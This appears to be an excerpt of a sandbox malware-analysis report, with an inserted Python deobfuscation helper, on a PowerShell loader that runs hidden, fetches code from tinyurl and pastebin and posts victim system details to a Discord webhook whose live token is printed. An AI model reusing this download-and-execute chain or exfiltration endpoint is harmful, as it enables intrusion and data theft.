                                                                              2024-10-15 13:54:02 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
Data Ascii (decoded from the raw bytes above; last 618-byte segment, display truncated by the report; line breaks restored):
======================
"@
} | ConvertTo-Json

# Send the POST request to the webhook URL
try {
    Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json"
    Write-Output "Message sent successfully."
} catch {
    W
(segment display ends here)
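The chain in sessions 3 to 6 (paste fetch, concatenated URL, raw GitHub fetch) and the Discord webhook POST that follows can be worked through mechanically. The Python below is an added analysis helper, not part of the Joe Sandbox report or of the sample: it decodes the report's "Data Raw" hex, removes the chunked-transfer framing (the "85" and "0" lines), folds the "a"+"b" string concatenation back into one literal, substitutes the loader's aliases, and extracts the download URL and the Discord webhook ID. The hex, the request line and the User-Agent are copied from this report; the function names, the alias map (calliT and WINDOWS_NT are assumed to stand for Invoke-Expression and Invoke-WebRequest, as the loader's sal commands define them) and the classify() tags are this example's own.

```python
"""Added analysis helper: decode this report's 'Data Raw' hex, strip HTTP
chunked framing, fold PowerShell "a"+"b" concatenation, resolve the loader's
aliases and extract indicators. Not part of the report or the sample."""
import re
from typing import Dict, List, Optional

# Copied from the report: pastebin.com response data (139-byte chunk + terminator).
PASTEBIN_CHUNK_HEX = (
    "38 35 0d 0a "
    "63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 "
    "22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b "
    "22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b "
    "22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 "
    "2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a"
)
PASTEBIN_TERMINATOR_HEX = "30 0d 0a 0d 0a"
# Copied from the report: request line of the discord.com session and the PowerShell UA.
WEBHOOK_REQUEST_LINE = ("POST /api/webhooks/1285453590428782614/"
                        "2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1")
UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"
# Assumption for this example: the loader's 'sal' lines bind calliT to
# Invoke-Expression and an alias named after $env:os (Windows_NT) to Invoke-WebRequest.
ALIASES = {"calliT": "Invoke-Expression", "WINDOWS_NT": "Invoke-WebRequest"}


def hex_dump_to_bytes(dump: str) -> bytes:
    """Turn a Joe Sandbox 'Data Raw' hex string into bytes."""
    return bytes.fromhex(dump.replace(" ", ""))


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body; stops cleanly on a truncated capture."""
    out = bytearray()
    pos = 0
    while True:
        nl = body.find(b"\r\n", pos)
        if nl < 0:
            break
        size_field = body[pos:nl].split(b";")[0].strip()  # drop chunk extensions
        if not size_field:
            break
        size = int(size_field, 16)
        if size == 0:                                      # terminating chunk
            break
        out += body[nl + 2:nl + 2 + size]
        pos = nl + 2 + size + 2                             # skip data and its CRLF
    return bytes(out)


_CONCAT = re.compile(r'"([^"]*)"\s*\+\s*"([^"]*)"')


def fold_concat(ps: str) -> str:
    """Fold "a"+"b"+"c" chains into one literal, repeating until nothing changes."""
    prev = None
    while prev != ps:
        prev = ps
        ps = _CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', ps)
    return ps


def resolve_aliases(ps: str) -> str:
    """Replace the loader's alias names with the cmdlets they stand for."""
    for alias, cmdlet in ALIASES.items():
        ps = re.sub(r"\b" + re.escape(alias) + r"\b", cmdlet, ps, flags=re.IGNORECASE)
    return ps


def extract_urls(ps: str) -> List[str]:
    """Quoted literals shaped like host/path (the sample omits the scheme)."""
    return [s for s in re.findall(r'"([^"]+)"', ps) if re.match(r"^[\w.-]+\.[a-z]{2,}/", s)]


def webhook_id(request_line: str) -> Optional[str]:
    """Discord webhook ID from 'POST /api/webhooks/<id>/<token> HTTP/1.1'."""
    m = re.match(r"POST /api/webhooks/(\d+)/[A-Za-z0-9_-]+ HTTP/1\.1$", request_line)
    return m.group(1) if m else None


def classify(host: str, path: str, user_agent: str) -> Optional[str]:
    """Tag a PowerShell-originated request by its role in this kind of chain."""
    if "WindowsPowerShell/" not in user_agent:
        return None
    if host == "pastebin.com" and path.startswith("/raw/"):
        return "stage fetch: paste service"
    if host == "raw.githubusercontent.com":
        return "stage fetch: raw GitHub content"
    if host == "discord.com" and path.startswith("/api/webhooks/"):
        return "exfil: Discord webhook"
    return None


def analyse_paste() -> Dict[str, object]:
    """Run the whole pipeline over the pastebin chunk copied from the report."""
    raw = hex_dump_to_bytes(PASTEBIN_CHUNK_HEX) + hex_dump_to_bytes(PASTEBIN_TERMINATOR_HEX)
    script = dechunk(raw).decode("ascii").strip()
    folded = fold_concat(script)
    return {"script": script,
            "deobfuscated": resolve_aliases(folded),
            "urls": extract_urls(folded),
            "webhook_id": webhook_id(WEBHOOK_REQUEST_LINE)}


if __name__ == "__main__":
    for key, value in analyse_paste().items():
        print(f"{key}: {value}")
    # Hosts and paths copied from the report's session list.
    for host, path in [("pastebin.com", "/raw/sA04Mwk2"),
                       ("raw.githubusercontent.com", "/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt"),
                       ("discord.com", WEBHOOK_REQUEST_LINE.split()[1])]:
        print(host, "->", classify(host, path, UA))
```

dechunk() deliberately tolerates a body that ends mid-chunk, because the report displays only the first few hundred bytes of each 1378-byte segment of gaber.txt; running it over those segments yields the visible prefix rather than an exception. The regex in fold_concat() only handles plain double-quoted pieces, which is all this sample uses; single-quoted or format-operator variants would need their own rule.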


Session 7
  Source: 192.168.2.10:49720
  Destination: 162.159.137.232:443
  PID: 2040
  Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

2024-10-15 13:54:07 UTC  311 bytes  OUT
POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/json
Host: discord.com
Content-Length: 294
Connection: Keep-Alive
                                                                              2024-10-15 13:54:07 UTC294OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 62 72 6f 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 56 45 4e 55 47 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46 41 4c 53
                                                                              Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** VENUG\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - FALS
                                                                              2024-10-15 13:54:08 UTC1350INHTTP/1.1 204 No Content
                                                                              Date: Tue, 15 Oct 2024 13:54:08 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              set-cookie: __dcfduid=f2c19d768afc11ef8fadaa6d64cdf669; Expires=Sun, 14-Oct-2029 13:54:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                              x-ratelimit-limit: 5
                                                                              x-ratelimit-remaining: 3
                                                                              x-ratelimit-reset: 1729000449
                                                                              x-ratelimit-reset-after: 1
                                                                              via: 1.1 google
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1CJ2wNgr2f6k8cyC0VmhTn%2FTTMCpxuxtNDgUAblaK4FDGPfXweccRKfQvoWMNZ8V24IaY00JWhuV7uZHIAGdhE0cWevKDxT1mPiXBWdm6Ay1U4tumue78LdH7kFy"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              X-Content-Type-Options: nosniff
                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                              Set-Cookie: __sdcfduid=f2c19d768afc11ef8fadaa6d64cdf6696ba1b1207af5499aa0b40bb51ffe05cc731a6ac88dcbad2a33b7e64ffadc07da; Expires=Sun, 14-Oct-2029 13:54:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              Set-Cookie: __cfruid=5c6b0a66b89033257b144fd7b0c8cf669f14427e-1729000448; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-10-15 13:54:08 UTC | 211 | IN | Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 44 4f 59 6f 35 6a 51 66 51 62 51 35 4d 73 79 44 39 39 48 71 75 30 78 33 36 47 58 46 73 6d 36 2e 6d 6c 6f 66 50 52 62 43 57 4c 4d 2d 31 37 32 39 30 30 30 34 34 38 31 31 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 63 39 66 38 63 39 39 36 62 62 30 2d 44 46 57 0d 0a 0d 0a
                                                                              Data Ascii: Set-Cookie: _cfuvid=DOYo5jQfQbQ5MsyD99Hqu0x36GXFsm6.mlofPRbCWLM-1729000448113-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304c9f8c996bb0-DFW


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.10 | 49722 | 162.159.137.232 | 443 | 5024 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-15 13:54:16 UTC | 311 | OUT | POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/json
Host: discord.com
Content-Length: 294
Connection: Keep-Alive
2024-10-15 13:54:16 UTC | 294 | OUT | Data Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 62 72 6f 6b 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 56 45 4e 55 47 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20 2d 20 46 41 4c 53
Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** VENUG\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC - FALS
2024-10-15 13:54:16 UTC | 1360 | IN | HTTP/1.1 204 No Content
                                                                              Date: Tue, 15 Oct 2024 13:54:16 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              set-cookie: __dcfduid=f7a342ea8afc11ef8fb196b35c36c75f; Expires=Sun, 14-Oct-2029 13:54:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                              x-ratelimit-limit: 5
                                                                              x-ratelimit-remaining: 4
                                                                              x-ratelimit-reset: 1729000457
                                                                              x-ratelimit-reset-after: 1
                                                                              via: 1.1 google
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7A%2BTR2QhD16hCmuoealGoXg35osTO3ScXyiCV5lCODesRF0qqrYcPC1M5fDvb9BhImHfZMvZOztKHNrujhxf%2FjB4emMFn%2FxNCE3tyii%2BnPc4oFoZEv0%2BHC0dFPJ%2F"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              X-Content-Type-Options: nosniff
                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                              Set-Cookie: __sdcfduid=f7a342ea8afc11ef8fb196b35c36c75f9b260d0397ccceb6c7d70b104626c69e73ffebce3095c2ca65d76c73cc2180ee; Expires=Sun, 14-Oct-2029 13:54:16 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                              Set-Cookie: __cfruid=e3e5a909a52a1b7622574e260c8ab779dc32bd45-1729000456; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
2024-10-15 13:54:16 UTC | 211 | IN | Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 45 66 38 4a 70 77 30 70 61 78 59 72 6e 75 35 78 4b 4a 4a 68 51 65 74 65 7a 59 65 45 6a 35 59 56 74 4c 63 75 78 39 77 63 74 55 45 2d 31 37 32 39 30 30 30 34 35 36 33 30 38 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 63 64 32 65 38 62 36 65 37 65 33 2d 44 46 57 0d 0a 0d 0a
                                                                              Data Ascii: Set-Cookie: _cfuvid=Ef8Jpw0paxYrnu5xKJJhQetezYeEj5YVtLcux9wctUE-1729000456308-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304cd2e8b6e7e3-DFW



                                                                              Target ID:1
                                                                              Start time:09:53:19
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\forfiles.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'"
                                                                              Imagebase:0x7ff694540000
                                                                              File size:52'224 bytes
                                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:09:53:19
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff620390000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:09:53:20
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'
                                                                              Imagebase:0x7ff7b2bb0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:4
                                                                              Start time:09:53:22
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)"
                                                                              Imagebase:0x7ff7b2bb0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:09:53:46
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\attrib.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                              Imagebase:0x7ff66f790000
                                                                              File size:23'040 bytes
                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:09:53:48
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\forfiles.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                              Imagebase:0x7ff694540000
                                                                              File size:52'224 bytes
                                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:09:53:48
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff620390000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:09:53:49
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                              Imagebase:0x7ff7b2bb0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:11
                                                                              Start time:09:53:49
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                              Imagebase:0x7ff7b2bb0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:09:53:56
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\forfiles.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                              Imagebase:0x7ff694540000
                                                                              File size:52'224 bytes
                                                                              MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:09:53:57
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff620390000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:14
                                                                              Start time:09:53:57
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                              Imagebase:0x7ff7b2bb0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:09:53:57
                                                                              Start date:15/10/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                              Imagebase:0x7ff7b2bb0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true


                                                                                Execution Graph

                                                                                Execution Coverage:2.8%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:3
                                                                                Total number of Limit Nodes:0

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 37f463c6893f5465d0bf15031067a131cc2471e116fadc50356e603e14a4b17a
                                                                                • Instruction ID: 353a49b8557ed49b9933a8b9183bb66ccee3bdf8238d0919f9c9cc639d03f462
                                                                                • Opcode Fuzzy Hash: 37f463c6893f5465d0bf15031067a131cc2471e116fadc50356e603e14a4b17a
                                                                                • Instruction Fuzzy Hash: FAF19530908A8D8FEBA8EF28C8557F977E1FFA5310F44436AD84DC7295DB3499458B81

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b5c26950d657e450d4ff68937eccf93445bbe29bdcf973b120597513ec022d45
                                                                                • Instruction ID: ab79643f8668ca068dfac498a5d7018c4821541556e6352c0b5076cc157a05b9
                                                                                • Opcode Fuzzy Hash: b5c26950d657e450d4ff68937eccf93445bbe29bdcf973b120597513ec022d45
                                                                                • Instruction Fuzzy Hash: CBE1C530908A8E8FEBA8EF2CC8557F977D1FFA5310F44426AE84DC7295CE7499458B81

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.1785069891.00007FF7BFEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFEF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_7ff7bfef0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 1d09fe01e26a054624260182c8f659ce4803bd74f1c3c8ef499d3cdddec06b56
                                                                                • Instruction ID: 9e839320a3f79cf42e6951b3f3e3ac245dfacff01200f9c24d974a03b8f52ad7
                                                                                • Opcode Fuzzy Hash: 1d09fe01e26a054624260182c8f659ce4803bd74f1c3c8ef499d3cdddec06b56
                                                                                • Instruction Fuzzy Hash: 3D31E67190CA4D8FDB19DF6CD845BE9BBE0FB66321F04426BD009C3256DB74A405CB91

                                                                                Control-flow Graph

                                                                                Memory Dump Source
